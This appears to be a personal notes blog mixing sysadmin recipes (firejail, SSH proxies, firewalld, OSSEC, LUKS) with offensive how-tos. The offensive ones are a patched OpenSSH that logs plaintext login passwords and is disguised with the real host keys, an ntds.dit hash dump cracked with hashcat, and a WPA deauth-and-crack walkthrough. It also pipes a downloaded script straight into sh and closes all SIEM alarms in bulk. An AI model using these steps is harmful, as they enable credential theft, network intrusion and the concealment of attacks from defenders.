firejail –private google-chrome

or this

firejail –private google-chrome –proxy-server=”socks5://localhost:8080″

But on a few occasions I want to be able to join ssh to the same sandbox instance…so I do this:

firejail –list

firejail –join=3452
(or whatever the session you want)

Another thing I have ran into is I downloaded something but want to save it before I destroy my firejail (private) session…so I do this:

firejail –get=5255 ~/.config/google-chrome/Default/Cookies

You can see more examples and other documentation here:

Firejail Usage

I want to edit sshd to log all user/password attempts.

Cent7

yum install git make zlib-devel openssl-devel openssh-devel pam-devel screen autoconf gcc vim-enhanced lsof
git clone https://github.com/openssh/openssh-portable.git
cd openssh-portable/
autoreconf
./configure
vim auth-passwd.c (add in my little log code in the auth_password function)

//for Lanix
logit(“sshd credentials:%s:%s”,authctxt->user,password);

make
we are going to use the built-in sshd_config and the current ssh_host_keys to prevent anyone remote being able to easily identify the trap.
cp /etc/ssh/sshd_config /root/  (modify this as there are multiple parts we didn’t complile into our ssh and errors will be thrown, also to test I run it first on a different port)
cp /etc/ssh/ssh_host_* /root/
chmod 0600 /root/ssh_host_*
/root/openssh-portable/sshd -f sshd_config -D (I test with the -D so that I can easily stop the program)
This will log things in /var/log/secure on a Cent7 box, just look for the “sshd credentials” LOL

Debian

apt-update
apt-get install zlib1g-dev screen vim make gcc autoconf git libssl1.0-dev
(libssl1.0-dev because regular libssl-dev throws errors on compile of ssh, well as of right now)
(not sure if these are needed yet) apt-get install libcrypto++-dev libgcrypt20 libcrypto++6 libcrypto++-utils r-cran-openssl
git clone https://github.com/openssh/openssh-portable.git
cd openssh-portables/
autoreconf
./configure

vim auth-passwd.c (add in my little log code in the auth_password function)

//for Lanix
logit(“sshd credentials:%s:%s”,authctxt->user,password);

make
we are going to use the built-in sshd_config and the current ssh_host_keys to prevent anyone remote being able to easily identify the trap.
cp /etc/ssh/sshd_config /root/  (modify this as there are multiple parts we didn’t complile into our ssh and errors will be thrown, also to test I run it first on a different port)
cp /etc/ssh/ssh_host_* /root/
chmod 0600 /root/ssh_host_*
/root/openssh-portable/sshd -f sshd_config -D (I test with the -D so that I can easily stop the program)
This will log things in /var/log/auth.log, just look for the “sshd credentials” LOL

First Windows password audit, or as I call it, Windblows Password Audit.

• Retrieve the ntds.dit and SYSTEM file: – notes from https://www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html
  • C:\>ntdsutil
  • ntdsutil: Activate Instance ntds
  • ntdsutil: ifm
  • ifm: create full c:\cool-pass-pentest-audit
  • ifm: quit
  • ntdsutil: quit
• copy the c:\cool-pass-pentest-audit folder to your kali box
• install the libesedb-utils
  • apt install libesedb-utils
• export the ntds tables – notes from https://www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html
  • esedbexport -m tables ntds.dit
  • (this may take a while…a long while)
• Now we need to extract the hashes….
  • currently I am using this: https://github.com/csababarta/ntdsxtract
    • git clone https://github.com/csababarta/ntdsxtract.git
  • python ntdsxtract/dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.6 hashdumpwork –syshive SYSTEM –passwordhashes –lmoutfile lm-out.txt –ntoutfile nt-out.txt –pwdformat ocl
• Now we can do some cracking, using hashcat (since I like to use GPUs)
  • We will start with the rockyou.txt.gz wordlist that came with my kali install
    • cd /usr/share/wordlists; gunzip rockyou.txt.gz; cd –
    • hashcat -a 0 -m 1000 –username hashdumpwork/nt-out.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule
      • I like to use most of the rule sets that come with the hashcat install on kali, I tend to get a bit of success with the different ones, but I will just give the example using the rockyou-30000.rule
• you want to see what passwords you got when it is over?  just do the same hashcat command but add the –show flag in there and presto!

Keep in mind you do need a server you have access to via ssh… I like cloud servers, they tend to not have web filters..lol

First we need to setup the ssh socks5 proxy, we will ssh into our VM (virtual machine server) and proxy through there on local port 8080:
ssh -D 8080 myuser@myserver.mydomain

Now, keep in mind I am using Kali 2017.1 for this next part but you can use other distros and even configure other browsers to connecto to your localhost:8080 proxy, I am using firejail and google-chrome. Firejail allows me to have an independant isolated browser running so I can still have my regular browser up and running as needed. This is how we connect:
firejail –private google-chrome –proxy-server=”socks5://localhost:8080″

Boom, good times…

<code>
systemctl start firewalld.service
systemctl enable firewalld.service
firewall-cmd –zone=”trusted” –add-source=<external IP 1>
firewall-cmd –zone=”trusted” –add-source=<external IP 1> –permanent
firewall-cmd –zone=”trusted” –add-source=<external IP 2>
firewall-cmd –zone=”trusted” –add-source=<external IP 2> –permanent
firewall-cmd –zone=”trusted” –add-service=ssh
firewall-cmd –zone=”trusted” –add-service=ssh –permanent
firewall-cmd –zone=”trusted” –list-all
firewall-cmd –zone=public –remove-service=ssh
firewall-cmd –zone=public –remove-service=ssh –permanent
</code>

First do this to find the network
airodump-ng -i wlan1

Focus in on that one network wap and capture the goodies
airodump-ng –bssid 00:1E:52:78:AA:5C -c6 –write WPAcrack wlan1

on another interface, do a deauth to force devices to reconnect
aireplay-ng –deauth 100 -a 00:1E:52:78:AA:5C wlan2

notice the “WPA handshake: 00:1E:52:78:AA:5C” at the top of the airodump screen?

now crack it with this:
aircrack-ng WPAcrack-01.cap -w /usr/share/wordlists/dirb/big.txt

or by using john the ripper:
john –incremental=all –session=WirelessBrute –stdout | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w –

Resume works as well:
john –restore=WirelessBrute | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w –
the other I am doing right now
john –incremental=all –session=BruteRockSteady –stdout | aircrack-ng -a 2 -b 88:1F:A1:38:9C:90 WPAcrackRock_Steady-01.cap -w –

Thanks to the following for information/tutorial :

https://www.hackthissite.org/articles/read/1094

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/

As an ethical hacker you can also use this to proxy your traffic over this connection….think of the possibilities.

This is an easy one to setup, first on the server side just make sure you have python installed. Then on the client side you need to have sshuttle installed and on the client side you will need root level access since you are changing routing and firewall rules.

Now to actually start routing traffic over ssh:

sshuttle -r username@sshserver 0.0.0.0/0 -vv

to route dns traffic

sshuttle --dns -vvr username@sshserver 0/0

1. wget -q -O – http://www.atomicorp.com/installers/atomic.sh | sh
2. yum install ossec-hids ossec-hids-client
3. add agent config to Alienvault
4. extract key
5. # /var/ossec/bin/manage_client
   (I – to import the key from Alienvault)
6. modify /var/ossec/etc/ossec-agent.conf
   (change server ip address)
7. service ossec-hids start
8. chkconfig ossec-hids on
9. On the Alienvault server – restart the ossec server in Environment-Detection-HIDS-Ossec Control

1. ssh into the alienvault database server or all-in-one server, and jailbreak to the command line.
2. use the ossim-db command:
   #  ossim-db
3. use the alienvault database:
   > use alienvault
4. First lets look at the tables involved with tickets – or incidents:
   > show tables like ‘incident%’;
5. Now mark all the incidents as closed:
   > select * from incident where not status = “Closed” limit 5;
6. Now look at the alarm tables:
   > show tables like ‘alarm%’;
7. Now mark all alarms as closed:
   > update alarm set status = “closed”;
8. Note: notice the incidents use a capitol on Closed, and the alarms use a lower case on closed.

1. download drivers from https://link.sandisk.com/Home/SoftwareDownload (may need to make account first) (in this case v 3.2.10)

2. # tar xvf fusionio-files-*.tar
3. # uname -r (now check the binary available does it match your kernel? – mine did not)
4. # cd fusionio-files-*/ioDrive2/Linux_centos-7/3.2.10/Software\ Source
5. # rpmbuild –rebuild iomemory-vsl-3.2.10.1509-1.0.el7.centos.src.rpm
6. # cd ~/rpmbuild/RPMS/x86_64/
7. # yum install iomemory-vsl-3.10.0*.rpm iomemory-vsl-config-3.10.0-*.rpm iomemory-vsl-source-3.2.10*.rpm
8. # cd ~/fusionio-files-*/ioDrive2/Linux_centos-7/3.2.10/Utilities/
9. # yum install fio*.rpm
10. # yum install lib*.rpm
11. # mkdir /var/lib/mongo
12. # modprobe iomemory-vsl
13. # dmesg (to vierify that the device was found)

**** now setup LUKS encryption ****

14. # cryptsetup -y create iomongo /dev/fioa
15. # mkfs.xfs /dev/mapper/iomongo
16. # mount /dev/mapper/iomongo /var/lib/mongo
17. # vim /etc/crypttab
add the line:
iomongo /dev/fioa none
18. # vim /etc/sysconfig/iomemory-vsl
uncomment the following:
ENABLED=1
modify and add the mount points
MOUNTS=”/var/lib/mongo”
19. # reboot
(verify everything comes up – notice if you have other LUKS encrypted devices and you use the same password on all of them, you will only be asked once for a password and all your devices should work)